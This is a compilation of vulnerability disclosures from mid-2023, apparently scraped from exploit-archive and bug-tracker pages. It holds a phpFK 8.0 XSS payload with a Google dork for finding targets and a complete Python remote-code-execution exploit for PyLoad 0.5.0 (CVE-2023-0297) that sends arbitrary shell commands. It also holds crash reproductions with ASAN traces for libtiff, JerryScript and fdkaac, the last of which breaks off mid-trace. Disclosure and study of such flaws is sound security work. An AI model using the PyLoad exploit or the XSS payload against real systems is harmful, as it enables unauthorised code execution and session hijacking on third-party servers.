phpFK version 8.0 suffers from a cross site scripting vulnerability.

**phpFK 8.0 Cross Site Scripting**

Posted Jun 15, 2023

Authored by indoushka

phpFK version 8.0 suffers from a cross site scripting vulnerability.

tags | exploit, xss

SHA-256 | 485c60ad53bb4abb98ff8bd8586f25cee5d5a57abf5f55c1615b45b7b607c8e0

Download | Favorite | View

**phpFK 8.0 Cross Site Scripting**

    ====================================================================================================================================| # Title     : phpFK v8.0 version XSS Vulnerability                                                                               || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 68.0(32-bit)                                               | | # Vendor    : https://www.frank-karau.de/demo-forum/                                                                             |  | # Dork      : Powered by: phpFK                                                                                                  |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use payload : /forum/thread.php?board=4&thema=349'"><svg/onload=prompt(/_indoushka_/);>{{7*7}}[+] http://127.0.0.1/forum/thread.php?board=4&thema=349%27%22%3E%3Csvg/onload=prompt(/_indoushka_/);%3E{{7*7}}Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm*                                            |                                                                                                                                              |=======================================================================================================================================

**File Tags**

*   ActiveX (932)
*   Advisory (81,379)
*   Arbitrary (16,086)
*   BBS (2,859)
*   Bypass (1,697)
*   CGI (1,024)
*   Code Execution (7,179)
*   Conference (678)
*   Cracker (841)
*   CSRF (3,321)
*   DoS (23,204)
*   Encryption (2,363)
*   Exploit (51,247)
*   File Inclusion (4,196)
*   File Upload (956)
*   Firewall (821)
*   Info Disclosure (2,722)
*   Intrusion Detection (885)
*   Java (3,003)
*   JavaScript (842)
*   Kernel (6,586)
*   Local (14,394)
*   Magazine (586)
*   Overflow (12,621)
*   Perl (1,423)
*   PHP (5,129)
*   Proof of Concept (2,335)
*   Protocol (3,567)
*   Python (1,510)
*   Remote (30,539)
*   Root (3,567)
*   Rootkit (506)
*   Ruby (609)
*   Scanner (1,633)
*   Security Tool (7,856)
*   Shell (3,165)
*   Shellcode (1,211)
*   Sniffer (893)
*   Spoof (2,189)
*   SQL Injection (16,237)
*   TCP (2,395)
*   Trojan (687)
*   UDP (884)
*   Virus (664)
*   Vulnerability (31,601)
*   Web (9,579)
*   Whitepaper (3,745)
*   x86 (961)
*   XSS (17,701)
*   Other

**File Archives**

*   June 2023
*   May 2023
*   April 2023
*   March 2023
*   February 2023
*   January 2023
*   December 2022
*   November 2022
*   October 2022
*   September 2022
*   August 2022
*   July 2022
*   Older

**Systems**

*   AIX (428)
*   Apple (1,980)
*   BSD (373)
*   CentOS (57)
*   Cisco (1,921)
*   Debian (6,762)
*   Fedora (1,691)
*   FreeBSD (1,244)
*   Gentoo (4,321)
*   HPUX (879)
*   iOS (345)
*   iPhone (108)
*   IRIX (220)
*   Juniper (67)
*   Linux (45,894)
*   Mac OS X (685)
*   Mandriva (3,105)
*   NetBSD (256)
*   OpenBSD (482)
*   RedHat (13,380)
*   Slackware (941)
*   Solaris (1,610)
*   SUSE (1,444)
*   Ubuntu (8,666)
*   UNIX (9,249)
*   UnixWare (186)
*   Windows (6,558)
*   Other

phpFK 8.0 Cross Site Scripting

PyLoad version 0.5.0 suffers from an unauthenticated remote code execution vulnerability.

    # Exploit Title: PyLoad 0.5.0 - Pre-auth Remote Code Execution (RCE)# Date: 06-10-2023# Credits: bAu @bauh0lz # Exploit Author: Gabriel Lima (0xGabe)# Vendor Homepage: https://pyload.net/# Software Link: https://github.com/pyload/pyload# Version: 0.5.0# Tested on: Ubuntu 20.04.6# CVE: CVE-2023-0297import requests, argparseparser = argparse.ArgumentParser()parser.add_argument('-u', action='store', dest='url', required=True, help='Target url.')parser.add_argument('-c', action='store', dest='cmd', required=True, help='Command to execute.')arguments = parser.parse_args()def doRequest(url):    try:        res = requests.get(url)        if res.status_code == 200:            return True        else:            return False    except requests.exceptions.RequestException as e:        print("[!] Maybe the host is offline :", e)        exit()def runExploit(url, cmd):    endpoint = url + '/flash/addcrypted2'    if " " in cmd:        validCommand = cmd.replace(" ", "%20")    else:        validCommand = cmd    payload = 'jk=pyimport%20os;os.system("'+validCommand+'");f=function%20f2(){};&package=xxx&crypted=AAAA&&passwords=aaaa'    test = requests.post(endpoint, headers={'Content-type': 'application/x-www-form-urlencoded'},data=payload)    print('[+] The exploit has be executeded in target machine. ')def main(targetUrl, Command):    print('[+] Check if target host is alive: ' + targetUrl)    alive = doRequest(targetUrl)    if alive == True:        print("[+] Host up, let's exploit! ")        runExploit(targetUrl,Command)    else:        print('[-] Host down! ')if(arguments.url != None and arguments.cmd != None):    targetUrl = arguments.url    Command = arguments.cmd    main(targetUrl, Command)

PyLoad 0.5.0 Remote Code Execution

libtiff 4.5.0 is vulnerable to Buffer Overflow via extractContigSamplesBytes() at /libtiff/tools/tiffcrop.c:3215.

Skip to content

Open Issue created Jan 27, 2023 by **Tseng Szu Wei@13579and24680**

**heap-buffer-overflow in extractContigSamplesBytes() at /libtiff/tools/tiffcrop.c:3215 (SIGSEGV)**

**Summary**

An SIGSEGV caused when using tiffcrop.

AddressSanitizer reports it as heap-buffer-overflow.

**Version**

    $ ./tools/tiffcrop  -v
    Library Release: LIBTIFF, Version 4.5.0
    Copyright (c) 1988-1996 Sam Leffler
    Copyright (c) 1991-1996 Silicon Graphics, Inc.
    Tiffcp code: Copyright (c) 1988-1997 Sam Leffler
               : Copyright (c) 1991-1997 Silicon Graphics, Inc
    Tiffcrop additions: Copyright (c) 2007-2010 Richard Nolde
    
    $ git log --oneline -1
    a63e18ca (HEAD -> master, origin/master, origin/HEAD) Merge branch 'add_windows_DLL_versioninfo' into 'master'

**Steps to reproduce****make**

    git clone https://gitlab.com/libtiff/libtiff.git
    cd libtiff
    ./autogen.sh
    ./configure
    make

**run**

    $ ./tools/tiffcrop -E l -Z 12:50,12:99 -e divided -R 90   poc  /dev/null
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per sample.
    TIFFAdvanceDirectory: Error fetching directory count.
    OJPEGSetupDecode: Warning, Deprecated and troublesome old-style JPEG compression mode, please convert to new-style JPEG compression and notify vendor of writing software.
    LibJpeg: Warning, Corrupt JPEG data: bad Huffman code.
    fish: Job 1, './tools/tiffcrop -E l -Z 12:50,…' terminated by signal SIGSEGV (Address boundary error)

**Platform**

    $ uname -a
    Linux 13579 5.15.0-56-generic #62~20.04.1-Ubuntu SMP Tue Nov 22 21:24:20 UTC 2022 x86_64 x86_64 x86_64 GNU/Linux
    
    $ gcc --version
    gcc (Ubuntu 9.4.0-1ubuntu1~20.04.1) 9.4.0
    Copyright (C) 2019 Free Software Foundation, Inc.
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

**ASAN report**

    ../libtiff_asan/libtiff/tools/tiffcrop -E l -Z 12:50,12:99 -e divided  -R 90  poc  /dev/null
    TIFFReadDirectoryCheckOrder: Warning, Invalid TIFF directory; tags are not sorted in ascending order.
    TIFFReadDirectory: Warning, Unknown field with tag 12336 (0x3030) encountered.
    TIFFReadDirectory: Warning, Unknown field with tag 0 (0x0) encountered.
    TIFFFetchNormalTag: Defined set_field_type of custom tag 12336 (Tag 12336) is TIFF_SETGET_UNDEFINED and thus tag is not read from file.
    TIFFReadDirectory: Warning, BitsPerSample tag is missing, assuming 8 bits per sample.
    TIFFAdvanceDirectory: Error fetching directory count.
    OJPEGSetupDecode: Warning, Deprecated and troublesome old-style JPEG compression mode, please convert to new-style JPEG compression and notify vendor of writing software.
    LibJpeg: Warning, Corrupt JPEG data: bad Huffman code.
    =================================================================
    ==2323018==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x627000006160 at pc 0x7fa1008f3490 bp 0x7ffcb8bf9ab0 sp 0x7ffcb8bf9258
    READ of size 1 at 0x627000006160 thread T0
        #0 0x7fa1008f348f in __interceptor_memcpy ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790
        #1 0x7fa1007ecfe9 in _TIFFmemcpy /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/libtiff/tif_unix.c:345
        #2 0x556b1b674244 in extractContigSamplesBytes /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:3215
        #3 0x556b1b68bf83 in extractSeparateRegion /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:7593
        #4 0x556b1b68ffd0 in processCropSelections /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:8621
        #5 0x556b1b6720e9 in main /home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/tiffcrop.c:2807
        #6 0x7fa1002b0082 in __libc_start_main ../csu/libc-start.c:308
        #7 0x556b1b668b6d in _start (/home/a13579/fuzz_lib_tiff/report/libtiff_asan/libtiff/tools/.libs/tiffcrop+0x9b6d)
    
    Address 0x627000006160 is a wild pointer.
    SUMMARY: AddressSanitizer: heap-buffer-overflow ../../../../src/libsanitizer/sanitizer_common/sanitizer_common_interceptors.inc:790 in __interceptor_memcpy
    Shadow bytes around the buggy address:
      0x0c4e7fff8bd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8be0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8bf0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    =>0x0c4e7fff8c20: fa fa fa fa fa fa fa fa fa fa fa fa[fa]fa fa fa
      0x0c4e7fff8c30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c60: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c4e7fff8c70: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==2323018==ABORTING

**poc**

poc

CVE-2023-25434: heap-buffer-overflow in extractContigSamplesBytes() at /libtiff/tools/tiffcrop.c:3215 (SIGSEGV) (#519) · Issues · libtiff / libtiff · GitLab

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the parser_parse_for_statement_start at jerry-core/parser/js/js-parser-statm.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**testcase

var r \= { } ; 
var t \= \[ r , r , r , r , r , r , r , r , r , r , r , r , r , r , r \] ; 
var a \= \[ \] ; 
const e \= 8 ; 
for ( var n \= 0 ; n < 8 ; ++ n ) { 
	for ( var o \= 0 ; o < t . length ; ++ o ) { 
		a . push ( String . prototype . indexOf . call ( t \[ n \] , " object " ) ) ; 
	} 
} 
a \[ 8 \] \= a \= \[ \] ; 
8 \* t , f . length ; 
var c \= class extends c { static { } ; } ; 
for ( var n \= 0 ; n < a . length ; ++ n ) { 
	var f \= { } , t \= f ; 
	r \= 0 ; 
	r += a \[ n \] ; 
	1 ; 
}

// poc.js
var c \= class extends c { static { } ; } ;
for ( var n \= 0 ; n < a . length ; ++ n ) {
        r += a \[ n \] ;
}

**Execution steps & Output**

    $ ./jerryscript/build/bin/jerry poc.js
    ICE: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start):1502.
    Error: JERRY_FATAL_FAILED_ASSERTION
    Aborted
    

**Backtrace**

    (gdb) bt
    #0  0xf7fcfd99 in __kernel_vsyscall ()
    #1  0xf7ca4276 in raise () from /lib32/libc.so.6
    #2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
        at ./jerryscript/jerry-port/common/jerry-port-process.c:29
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION)
        at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
    #5  0x08260d64 in jerry_assert_fail (assertion=0x8479a60 <str> "context_p->token.type != LEXER_RIGHT_PAREN",
        file=0x84789e0 <str> "./jerryscript/jerry-core/parser/js/js-parser-statm.c",
        function=0x8479b20 <__func__.parser_parse_for_statement_start> "parser_parse_for_statement_start", line=1502)
        at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
    #6  0x083d5567 in parser_parse_for_statement_start (context_p=<optimized out>)
        at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:1502
    #7  parser_parse_statements (context_p=<optimized out>)
        at ./jerryscript/jerry-core/parser/js/js-parser-statm.c:2851
    #8  0x08284a26 in parser_parse_source (source_p=0xffffd030, parse_opts=<optimized out>, options_p=0xffffd100)
        at ./jerryscript/jerry-core/parser/js/js-parser.c:2280
    #9  0x08282c70 in parser_parse_script (source_p=0xffffd030, parse_opts=0, options_p=0xffffd100)
        at ./jerryscript/jerry-core/parser/js/js-parser.c:3326
    #10 0x08129a7d in jerry_parse_common (source_p=0xffffd030, options_p=<optimized out>, parse_opts=0)
        at ./jerryscript/jerry-core/api/jerryscript.c:412
    #11 0x08129698 in jerry_parse (source_p=<optimized out>, source_size=<optimized out>, options_p=<optimized out>)
        at ./jerryscript/jerry-core/api/jerryscript.c:480
    #12 0x083ea952 in jerryx_source_parse_script (path_p=<optimized out>)
        at ./jerryscript/jerry-ext/util/sources.c:52
    #13 0x083eac12 in jerryx_source_exec_script (path_p=0xffffd5da "poc.js")
        at ./jerryscript/jerry-ext/util/sources.c:63
    #14 0x0812162d in main (argc=<optimized out>, argv=<optimized out>)
        at ./jerryscript/jerry-main/main-desktop.c:156
    (gdb)
    
    

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-34868: Assertion 'context_p->token.type != LEXER_RIGHT_PAREN' failed at ./jerryscript/jerry-core/parser/js/js-parser-statm.c(parser_parse_for_statement_start) · Issue #5083 · jerryscript-project/jerryscript

Jerryscript 3.0 (commit 05dbbd1) was discovered to contain an Assertion Failure via the ecma_property_hashmap_create at jerry-core/ecma/base/ecma-property-hashmap.c.

**JerryScript revision**

Commit: 05dbbd1  
Version: v3.0.0

**Build platform**

Ubuntu 20.04.5 LTS (Linux 5.4.0-144-generic x86\_64)

**Build steps**

python ./tools/build.py --clean --debug --compile-flag=-m32 --compile-flag=-fno-omit-frame-pointer --compile-flag=-fno-common --compile-flag=-fsanitize=address --compile-flag=-g --strip=off --lto=off --error-messages=on --system-allocator=on --logging=on --line-info=on --stack-limit=20

**Test case**testcase

var r \= function ( func0 , a ) { 
	for ( var v in a || { } ) { 
		r \[ v \] \= a \[ v \] ; 
	} return r ; 
} ; 
var a \= \[ \] ; 
for ( var v \= 0 ; v < 256 ; v ++ ) { 
	var n \= Object . create ( null ) ; 
	a . push ( n , a ) ; 
	n . v \= 1 ; 
	n . o \= 1 ; 
	n \= new WeakSet ( a ) ; 
	n . t \= 1 ; 
	n . o \= 1 ; 
} 
n . i \= 1 ; 

if ( ! a ) throw new Test262Error ( " out " ) ;

n . O \= 1 ; 
n . m \= 1 ; 
n \= JSON . stringify ( JSON . stringify ( n , a ) ) ; 

if ( r . deref != 1 ) throw new Test262Error ( " digit " ) ; 

n . h \= 1 ; 
n . T \= 1 ; 
n . U \= 1 ; 
n . g \= 1 ; 
n . j \= 1 ; 
n . k \= 1 ; 
n . m \= 1 ; 
n . p \= 1 ; 
n . q \= 1 ; 
n . A \= 1 ; 
n . B \= 1 ; 
n . as \= 1 ; 
n . C \= 1 ; 
n . A \= 1 ; 
n . q \= 0.1 ; 
n . D \= 1 ; 
n . F \= 1 ; 
n . G \= 1 ; 
n . ax \= 1 ; 
n . ax \= 1 ; 
n . H \= 1 ; 
n . I \= 1 ; 
n . J \= 1 ; 
n . K \= 1 ; 
n . L \= 1 ; 
n . M \= 1 ; 
n . N \= 1 ; 
var o \= Object . create ( n ) ; 
var f \= r ( { } , o ) ; 
for ( var t in f ) { 
	if ( f \[ t \] !== f \[ " " \] ) { 
		if ( f \[ t \] !== f \[ " " + t \] ) { 
			throw new Error ( " OUT " ) ; 
		} 
	} 
}

// poc.js
var a \= \[ \] ;
for ( var v \= 0 ; v < 256 ; v ++ ) {
        var n \= Object . create ( null ) ;
        a . push ( n , a ) ;
        n \= new WeakSet ( a ) ;
        n . o \= 1 ;
}

**Execution steps & Output**

    $ ./jerryscript/build/bin/jerry poc.js
    ICE: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create):146.
    Error: JERRY_FATAL_FAILED_ASSERTION
    Aborted
    

**Backtrace**

    (gdb) bt
    #0  0xf7fcfd99 in __kernel_vsyscall ()
    #1  0xf7ca4276 in raise () from /lib32/libc.so.6
    #2  0xf7c8c3f7 in abort () from /lib32/libc.so.6
    #3  0x083ecca3 in jerry_port_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-port/common/jerry-port-process.c:29
    #4  0x08260d02 in jerry_fatal (code=JERRY_FATAL_FAILED_ASSERTION) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:63
    #5  0x08260d64 in jerry_assert_fail (assertion=0x8418d00 <str> "ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)",
        file=0x8418d60 <str> "./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c", function=0x8418de0 <__func__.ecma_property_hashmap_create> "ecma_property_hashmap_create",
        line=146) at ./jerryscript/jerry-core/jrt/jrt-fatals.c:83
    #6  0x081a3e63 in ecma_property_hashmap_create (object_p=0xf5500880) at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:146
    #7  0x081a4342 in ecma_property_hashmap_insert (object_p=0xf5500880, name_p=0x3815, property_pair_p=0xf2d1a140, property_index=0)
        at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c:236
    #8  0x08189d0a in ecma_create_property (object_p=<optimized out>, name_p=<optimized out>, type_and_flags=<optimized out>, value=..., out_prop_p=<optimized out>)
        at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:448
    #9  0x0818836a in ecma_create_named_data_property (object_p=0xf5500880, name_p=0x3815, prop_attributes=7 '\a', out_prop_p=0x0)
        at ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:536
    #10 0x08217e4e in ecma_op_object_put_apply_receiver (receiver=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, is_throw=<optimized out>)
        at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1241
    #11 0x08216a71 in ecma_op_object_put_with_receiver (object_p=<optimized out>, property_name_p=<optimized out>, value=<optimized out>, receiver=<optimized out>, is_throw=<optimized out>)
        at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1595
    #12 0x08214f3a in ecma_op_object_put (object_p=0xf5500880, property_name_p=0x3815, value=<optimized out>, is_throw=<optimized out>)
        at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1143
    #13 ecma_op_object_put_by_index (object_p=0xf5500880, index=448, value=4117759059, is_throw=<optimized out>) at ./jerryscript/jerry-core/ecma/operations/ecma-objects.c:1109
    #14 0x0830d9b1 in ecma_builtin_array_prototype_object_push (argument_list_p=<optimized out>, arguments_number=2, obj_p=0xf5500880, length=448)
        at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:465
    #15 ecma_builtin_array_prototype_dispatch_routine (builtin_routine_id=<optimized out>, this_arg=<optimized out>, arguments_list_p=<optimized out>, arguments_number=<optimized out>)
        at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-prototype.c:2839
    #16 0x081b94a5 in ecma_builtin_dispatch_routine (func_obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=0xffffce30, arguments_list_len=<optimized out>)
        at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
    #17 ecma_builtin_dispatch_call (obj_p=<optimized out>, this_arg_value=<optimized out>, arguments_list_p=<optimized out>, arguments_list_len=<optimized out>)
        at ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
    #18 0x081fb6b8 in ecma_op_function_call_native_built_in (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
        at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
    #19 0x081fa81d in ecma_op_function_call (func_obj_p=0xf5500790, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
        at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
    #20 0x081fa5cf in ecma_op_function_validated_call (callee=4115662739, this_arg_value=4115662979, arguments_list_p=0xffffd054, arguments_list_len=2)
        at ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1371
    #21 0x082d7631 in opfunc_call (frame_ctx_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:758
    #22 vm_execute (frame_ctx_p=0xffffd020) at ./jerryscript/jerry-core/vm/vm.c:5217
    #23 0x082d4f62 in vm_run (shared_p=0xffffd110, this_binding_value=4119870595, lex_env_p=0xf57007b0) at ./jerryscript/jerry-core/vm/vm.c:5312
    #24 0x082d4c39 in vm_run_global (bytecode_p=<optimized out>, function_object_p=<optimized out>) at ./jerryscript/jerry-core/vm/vm.c:286
    #25 0x0812a4e5 in jerry_run (script=4115663075) at ./jerryscript/jerry-core/api/jerryscript.c:548
    #26 0x083eac3f in jerryx_source_exec_script (path_p=0xffffd5df "poc.js") at ./jerryscript/jerry-ext/util/sources.c:68
    #27 0x0812162d in main (argc=<optimized out>, argv=<optimized out>) at ./jerryscript/jerry-main/main-desktop.c:156
    (gdb)
    

with release mode

**Outputs**

    AddressSanitizer:DEADLYSIGNAL
    =================================================================
    ==1512811==ERROR: AddressSanitizer: SEGV on unknown address 0x0000023e (pc 0x5659bb0f bp 0xff8ef1d8 sp 0xff8ef190 T0)
    ==1512811==The signal is caused by a READ memory access.
    ==1512811==Hint: address points to the zero page.
        #0 0x5659bb0e in ecma_gc_mark_properties ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287
        #1 0x5659e95d in ecma_gc_run ./jerryscript/jerry-core/ecma/base/ecma-gc.c:2158
        #2 0x565f3d83 in jmem_heap_gc_and_alloc_block ./jerryscript/jerry-core/jmem/jmem-heap.c:285
        #3 0x566365ad in ecma_alloc_property_pair ./jerryscript/jerry-core/ecma/base/ecma-alloc.c:253
        #4 0x565ac30d in ecma_create_property ./jerryscript/jerry-core/ecma/base/ecma-helpers.c:457
        #5 0x565d424d in ecma_create_iter_result_object ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:98
        #6 0x56636d82 in ecma_builtin_array_iterator_prototype_object_next ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:172
        #7 0x56636d82 in ecma_builtin_array_iterator_prototype_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-array-iterator-prototype.c:211
        #8 0x565bba28 in ecma_builtin_dispatch_routine ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1460
        #9 0x565bba28 in ecma_builtin_dispatch_call ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtins.c:1489
        #10 0x565d0db7 in ecma_op_function_call_native_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1217
        #11 0x565d2c84 in ecma_op_function_call ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1411
        #12 0x565d449d in ecma_op_iterator_next ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:317
        #13 0x565d46d3 in ecma_op_iterator_step ./jerryscript/jerry-core/ecma/operations/ecma-iterator-object.c:559
        #14 0x565ca92e in ecma_op_container_create ./jerryscript/jerry-core/ecma/operations/ecma-container-object.c:435
        #15 0x56657dbd in ecma_builtin_weakset_dispatch_construct ./jerryscript/jerry-core/ecma/builtin-objects/ecma-builtin-weakset.c:62
        #16 0x565d3086 in ecma_op_function_construct_built_in ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1537
        #17 0x565d3086 in ecma_op_function_construct ./jerryscript/jerry-core/ecma/operations/ecma-function-object.c:1717
        #18 0x56634c33 in opfunc_construct ./jerryscript/jerry-core/vm/vm.c:840
        #19 0x56634c33 in vm_execute ./jerryscript/jerry-core/vm/vm.c:5236
        #20 0x56635152 in vm_run ./jerryscript/jerry-core/vm/vm.c:5312
        #21 0x5663538f in vm_run_global ./jerryscript/jerry-core/vm/vm.c:286
        #22 0x5659382e in jerry_run ./jerryscript/jerry-core/api/jerryscript.c:548
        #23 0x5668871b in jerryx_source_exec_script ./jerryscript/jerry-ext/util/sources.c:68
        #24 0x5658bd04 in main ./jerryscript/jerry-main/main-desktop.c:156
        #25 0xf76ceed4 in __libc_start_main (/lib32/libc.so.6+0x1aed4)
        #26 0x5658efb4 in _start (/./jerryscript/build/bin/jerry+0x12fb4)
    
    AddressSanitizer can not provide additional info.
    SUMMARY: AddressSanitizer: SEGV ./jerryscript/jerry-core/ecma/base/ecma-gc.c:287 in ecma_gc_mark_properties
    ==1512811==ABORTING
    

Credits: @Ye0nny, @EJueon of the seclab-yonsei.

CVE-2023-34867: Assertion 'ECMA_PROPERTY_IS_PROPERTY_PAIR (prop_iter_p)' failed at ./jerryscript/jerry-core/ecma/base/ecma-property-hashmap.c(ecma_property_hashmap_create) · Issue #5084 · jerryscript-project/jerryscr

fdkaac before 1.0.5 was discovered to contain a heap buffer overflow in caf_info function in caf_reader.c.

Hi, developers of fdkaac:  
In the test of the binary fdkaac instrumented with ASAN. There is a Heap-buffer-overflow vulnerability in fdkaac, commit is 03c3c60 which is also the master branch.

Here is the ASAN mode output:

    =================================================================
    ==1664==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7efdfca69f00 at pc 0x00000047bf2c bp 0x7ffd4096cfe0 sp 0x7ffd4096c790
    READ of size 27 at 0x7efdfca69f00 thread T0
        #0 0x47bf2b in __interceptor_strlen.part.34 /home/ferry/Documents/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:375
        #1 0x4f9d94 in caf_info /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:116:19
        #2 0x4f88f2 in caf_parse /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:191:13
        #3 0x4f88f2 in caf_open /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:234:9
        #4 0x541f4f in open_input /home/ferry/hwz/zeroday/fdkaac/src/main.c:754:27
        #5 0x541f4f in main /home/ferry/hwz/zeroday/fdkaac/src/main.c:802:19
        #6 0x7efdfb80883f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
        #7 0x41b8a8 in _start (/home/ferry/hwz/zeroday/bin/fdkaac-asan/fdkaac+0x41b8a8)
    
    0x7efdfca69f00 is located 0 bytes to the right of 132864-byte region [0x7efdfca49800,0x7efdfca69f00)
    allocated by thread T0 here:
        #0 0x4aeca2 in malloc /home/ferry/Documents/llvm-project/compiler-rt/lib/asan/asan_malloc_linux.cpp:145
        #1 0x4f9cb1 in caf_info /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:109:34
        #2 0x4f88f2 in caf_parse /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:191:13
        #3 0x4f88f2 in caf_open /home/ferry/hwz/zeroday/fdkaac/src/caf_reader.c:234:9
        #4 0x541f4f in open_input /home/ferry/hwz/zeroday/fdkaac/src/main.c:754:27
        #5 0x541f4f in main /home/ferry/hwz/zeroday/fdkaac/src/main.c:802:19
        #6 0x7efdfb80883f in __libc_start_main /build/glibc-S7Ft5T/glibc-2.23/csu/../csu/libc-start.c:291
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow /home/ferry/Documents/llvm-project/compiler-rt/lib/asan/../sanitizer_common/sanitizer_common_interceptors.inc:375 in __interceptor_strlen.part.34
    Shadow bytes around the buggy address:
      0x0fe03f945390: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x0fe03f9453a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
